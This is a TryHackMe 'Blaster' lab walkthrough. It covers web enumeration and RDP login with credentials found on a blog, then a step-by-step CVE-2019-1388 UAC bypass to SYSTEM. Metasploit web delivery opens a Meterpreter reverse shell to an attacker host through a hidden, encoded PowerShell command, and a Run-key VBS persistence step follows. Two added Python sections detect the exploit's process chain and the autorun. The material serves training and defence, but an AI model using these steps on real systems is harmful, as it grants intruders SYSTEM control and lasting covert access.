Blaster - TryHackMe Walkthrough

Bypassing Windows UAC for Privilege Escalation

Room Overview: Blaster is a beginner-friendly Windows exploitation challenge that focuses on bypassing User Account Control (UAC) to achieve privilege escalation. This room teaches web application enumeration, credential discovery, RDP exploitation, and the exploitation of CVE-2019-1388 for privilege escalation.

Skills Required: Basic knowledge of Nmap, directory enumeration tools, understanding of RDP, Metasploit basics

Skills Learned: Web enumeration, credential hunting, Windows UAC bypass, privilege escalation, Metasploit web delivery, establishing persistence

Task 1: Mission Start

This room is a sequel to the "Ice" room and explores alternative exploitation methods beyond the typical Metasploit-heavy approach. We'll be using tools like Nmap and Gobuster for enumeration, then pivoting to Metasploit for persistence at the end.

Note: This is a Windows machine, so give it 3-5 minutes to fully boot up before beginning enumeration.

Task 2: Reconnaissance and Enumeration

Port Scanning

Let's begin with a standard Nmap scan to identify open ports and services:

nmap -sV [TARGET_IP]
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for [TARGET_IP]
Host is up (0.00067s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

Question: How many ports are open on our target system?

Answer: 2

Key Findings:

  • Port 80: HTTP (Microsoft IIS 10.0)
  • Port 3389: RDP (Remote Desktop Protocol)

Web Server Enumeration

Let's navigate to the web server and see what we find:

firefox http://[TARGET_IP]

Question: What is the title of the page we discover when browsing to it?

Answer: IIS Windows Server

We see the default IIS welcome page. Time to dig deeper with directory enumeration.

Directory Fuzzing

Using Gobuster to discover hidden directories:

gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://[TARGET_IP]/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/retro                (Status: 301) [Size: 144] [--> http://[TARGET_IP]/retro/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

Question: What hidden directory do we discover?

Answer: /retro

Discovering Credentials

Navigate to the /retro directory. We find a blog! Looking through the posts and comments, we discover some interesting information.

Question: What potential username do we discover?

Answer: Wade

After examining the blog posts, particularly the "Ready Player One" post and its comments, we find a potential password left in the comments.

Question: What possible password do we discover?

Answer: parzival

Remote Desktop Access

Now that we have credentials, let's connect via RDP using xfreerdp:

xfreerdp /u:wade /p:parzival /v:[TARGET_IP] /dynamic-resolution +clipboard

Successfully connected! On Wade's desktop, we find the user flag.

Question: What are the contents of user.txt?

Answer: THM{HACK_PLAYER_ONE}

Task 3: Privilege Escalation via UAC Bypass

Now comes the interesting part - escalating our privileges from a standard user to SYSTEM by exploiting a UAC bypass vulnerability.

Finding the Vulnerability

Looking around Wade's desktop and browsing history, we discover research about a specific CVE.

Question: What CVE was researched on this server?

Answer: CVE-2019-1388

What is CVE-2019-1388?

This is a Windows Certificate Dialog Elevation of Privilege vulnerability with a severity score of 7.8 (HIGH). The vulnerability exists when the Windows Certificate Dialog does not properly enforce user privileges, allowing an unprivileged user to launch a browser as SYSTEM through a clever exploitation technique.
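The process chain the description above implies (the UAC consent dialog hands off to a browser that is still running as SYSTEM, and that browser is then used to start cmd.exe) is also what a defender can watch for. The following is an added example, not code from the room or the original walkthrough: a small Python routine that classifies Sysmon-style process-creation records against the three stages of that chain. It assumes (not stated on the page) that events are already parsed into dicts using Sysmon's field names (Image, ParentImage, User), and that consent.exe is the parent of the browser, which is how this CVE has been described in public analysis. The sample events are constructed for the example.

```python
"""Added example (not part of the TryHackMe room or the original walkthrough):
detection logic for the CVE-2019-1388 process chain described above.

Assumptions (not from the page): records are Sysmon Event ID 1 (process
create) events parsed into dicts with the fields Image, ParentImage and User.
The sample events below are constructed, not real telemetry from the room.
"""
from __future__ import annotations

# The chain on the host: consent.exe (the UAC prompt, running as SYSTEM) shows
# the certificate viewer; its "Issued by" link launches a browser still in the
# SYSTEM context; the browser's Save As dialog is then used to start cmd.exe.
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Return the file name part of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> str | None:
    """Return a finding if the event matches one stage of the chain, else None."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    user = event.get("User", "").upper()

    # Stage 1: consent.exe only draws the elevation prompt; the elevated program
    # itself is started by the AppInfo service (svchost.exe), so a browser child
    # of consent.exe means the certificate-dialog link was clicked.
    if parent == "consent.exe" and image in BROWSERS:
        return "consent.exe spawned a browser (certificate dialog link)"
    # Stage 2: an interactive browser running as SYSTEM has no legitimate use.
    if image in BROWSERS and user == SYSTEM_USER:
        return "browser running as SYSTEM"
    # Stage 3: a SYSTEM shell whose parent is a browser (Save As -> Open cmd.exe).
    if image in SHELLS and parent in BROWSERS and user == SYSTEM_USER:
        return "SYSTEM shell spawned by a browser"
    return None


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run classify() over the events; return (event index, finding) pairs."""
    findings = []
    for i, ev in enumerate(events):
        hit = classify(ev)
        if hit:
            findings.append((i, hit))
    return findings


# Constructed sample events (not real telemetry from the room).
SAMPLE_EVENTS = [
    # benign: the user opens a browser from the desktop
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"RETROWEB\wade"},
    # benign: an elevated program approved through UAC (parent is the AppInfo svchost)
    {"Image": r"C:\Users\wade\Desktop\hhupd.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "User": r"RETROWEB\wade"},
    # stage 1 (and 2): the consent dialog launches a browser as SYSTEM
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\System32\consent.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    # stage 3: that browser spawns cmd.exe as SYSTEM
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Stage 1 on its own is the highest-signal rule, since consent.exe normally has no child processes at all; stages 2 and 3 catch the same chain when the parent relationship was not recorded. Patching (the November 2019 fix) removes the underlying bug; the detection is for hosts that have not yet received it.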

Locating the Exploit

Check the Recycle Bin on the desktop. Inside, you'll find an executable file.

Question: What is the name of this executable?

Answer: hhupd

Exploiting CVE-2019-1388

Before exploitation, let's verify our current privilege level:

whoami
retroweb\wade

whoami /groups

We're currently an unprivileged user. Now let's exploit the vulnerability:

Step-by-step exploitation process:

  1. Restore hhupd.exe from the Recycle Bin to the Desktop
  2. Right-click and run hhupd.exe
  3. Click "Show more details" on the UAC prompt
  4. Click "Show information about the publisher's certificate"
  5. In the Certificate window, click the "Issued by" link (VeriSign Commercial Software Publishers CA)
  6. This opens Internet Explorer. The page will fail to load - this is expected
  7. Click the gear icon (⚙️) in the top right corner
  8. Select File → Save as...
  9. You'll get an error "Location is not available" - click OK
  10. In the file path bar, type: c:\windows\system32\*.* and press ENTER
  11. Scroll down and find cmd.exe
  12. Right-click cmd.exe and select "Open"

A command prompt should open. Let's verify our privilege level:

whoami
nt authority\system

Question: What is the output of running whoami?

Answer: nt authority\system

Success! We now have SYSTEM-level privileges. Let's also check our group memberships:

whoami /groups

Important: Keep this elevated command prompt open for the next task. Do not close it!

Capturing the Root Flag

Navigate to the Administrator's desktop and read the root flag:

cd C:\Users\Administrator\Desktop
type root.txt

Question: What are the contents of root.txt?

Answer: THM{COIN_OPERATED_EXPLOITATION}

Task 4: Establishing Persistence with Metasploit

Now that we've compromised the target, let's establish persistence using Metasploit's web delivery module.

Setting Up Web Delivery

Return to your attack machine and launch Metasploit:

msfconsole -q
use exploit/multi/script/web_delivery

Configuring the Exploit

Check available targets:

show targets
Exploit targets:
=================

   Id  Name
   --  ----
=> 0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X

Question: Which target number is PSH (PowerShell)?

Answer: 2

Configure the exploit:

set target 2
set LHOST [YOUR_ATTACKER_IP]
set LPORT 4444
set payload windows/meterpreter/reverse_http
run -j
[*] Exploit running as background job 0.
[*] Started HTTP reverse handler on http://[YOUR_IP]:4444
[*] Using URL: http://[YOUR_IP]:8080/[RANDOM_STRING]
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [BASE64_ENCODED_COMMAND]

Executing the Payload

Copy the PowerShell command from the Metasploit output and paste it into the SYSTEM command prompt on the target machine that we kept open from Task 3.

After a moment, you should see a Meterpreter session open on your attacker machine:

[*] Sending stage (203846 bytes) to [TARGET_IP]
[*] Meterpreter session 1 opened ([ATTACKER_IP]:4444 -> [TARGET_IP]:49xxx)

Interacting with Meterpreter

sessions -i 1
getuid
Server username: NT AUTHORITY\SYSTEM
pwd
C:\Users\Administrator\Desktop

Setting Up Persistence

Now let's establish persistence so our access survives reboots:

Question: What command can we run to setup persistence which automatically starts when the system boots?

Answer: run persistence -X

Note: The run persistence command is deprecated in newer versions of Metasploit. Instead, background your session and use the exploit module:

background
use exploit/windows/local/persistence
set SESSION 1
run
[*] Running persistent module against RETROWEB via session ID: 1
[+] Persistent VBS script written on RETROWEB to C:\Windows\TEMP\[RANDOM].vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[RANDOM]
[+] Installed autorun on RETROWEB
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/RETROWEB_[DATE]/RETROWEB_[DATE].rc

The persistence mechanism has been successfully installed. As the output shows, the module drops a VBS script in C:\Windows\TEMP and registers it under the HKCU ...\CurrentVersion\Run key, so the script is executed automatically each time that user logs on and establishes a reverse connection back to your attack machine.
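The two artefacts the module leaves behind (a script in a temp directory, and a Run-key value pointing at it) are exactly what an analyst or a cleanup script looks for afterwards. The following is an added example, not code from the room, the original walkthrough or Metasploit: a Python check that takes Sysmon Event ID 13 (registry value set) records and reports Run/RunOnce values that launch a script, invoke a script host, or point into a temp directory. The field names TargetObject and Details are Sysmon's; the sample records are constructed, and the value and script name are placeholders standing in for the random name Metasploit generates.

```python
"""Added example (not part of the TryHackMe room or the original walkthrough):
a check for the kind of autorun the persistence module above installs.

Assumptions (not from the page): input records are Sysmon Event ID 13
(RegistryEvent, value set) events parsed into dicts with the fields
TargetObject and Details. The sample records are constructed; the value name
and script name are placeholders for the random name Metasploit generates.
"""
from __future__ import annotations
import re

# Autostart locations covered by this check (Run and RunOnce, any hive).
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.IGNORECASE)
# Script types that legitimate autoruns rarely use.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b", re.IGNORECASE)
# Script hosts that commonly front a dropped script.
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh)(\.exe)?\b", re.IGNORECASE)
# User- or world-writable staging directories.
TEMP_DIR = re.compile(r"\\(Windows\\)?Temp\\|%TEMP%|%TMP%", re.IGNORECASE)


def autorun_findings(target_object: str, details: str) -> list[str]:
    """Return the reasons a Run-key value looks suspicious (empty if none)."""
    if not AUTORUN_KEY.search(target_object):
        return []  # not an autostart value; nothing to say
    reasons = []
    if SCRIPT_EXT.search(details):
        reasons.append("autorun launches a script file")
    if SCRIPT_HOST.search(details):
        reasons.append("autorun invokes a script host")
    if TEMP_DIR.search(details):
        reasons.append("autorun target lives in a temp directory")
    return reasons


def scan_registry_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run autorun_findings() over EID 13 records; return (value path, reasons)."""
    out = []
    for ev in events:
        reasons = autorun_findings(ev.get("TargetObject", ""), ev.get("Details", ""))
        if reasons:
            out.append((ev["TargetObject"], reasons))
    return out


# Constructed sample records (not real telemetry from the room).
SAMPLE_EVENTS = [
    # benign: a normal application autorun under a user's profile
    {"TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\wade\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    # benign: a registry write that is not under an autostart key
    {"TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    # what the walkthrough's persistence step leaves behind (placeholder names)
    {"TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PLACEHOLDER_NAME",
     "Details": r"C:\Windows\TEMP\PLACEHOLDER_NAME.vbs"},
]

if __name__ == "__main__":
    for path, reasons in scan_registry_events(SAMPLE_EVENTS):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Each reason is reported separately so a single weak signal (a .bat under Program Files, say) can be triaged differently from the combination the room produces, a script file sitting in C:\Windows\TEMP. On the host itself the same check can be run against the live hive, but the event-based form also covers values that were created and later removed.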

Conclusion

Congratulations! You've successfully completed the Blaster room. Throughout this walkthrough, you've learned several critical skills:

  • Web application enumeration and directory fuzzing
  • Credential discovery through OSINT techniques
  • RDP access to Windows systems
  • Windows UAC bypass exploitation (CVE-2019-1388)
  • Privilege escalation from standard user to SYSTEM
  • Establishing remote access with Metasploit web delivery
  • Creating persistence mechanisms for maintaining access

Key Takeaway: CVE-2019-1388 demonstrates how seemingly minor UI interactions in Windows can be chained together to achieve privilege escalation. The vulnerability leverages the Windows Certificate Dialog opening Internet Explorer with SYSTEM privileges, then uses the "Save As" dialog to access system files including cmd.exe. This creative exploitation technique highlights why defense-in-depth is crucial - a single weakness in the security chain can compromise the entire system.

This room is part of a series including "Ice" (the prequel) and "Retro" (a more challenging version). If you enjoyed this challenge, check out those rooms for additional Windows exploitation practice.

[ UAC BYPASSED ] - [ SYSTEM ACCESS ACHIEVED ] - [ PERSISTENCE ESTABLISHED ]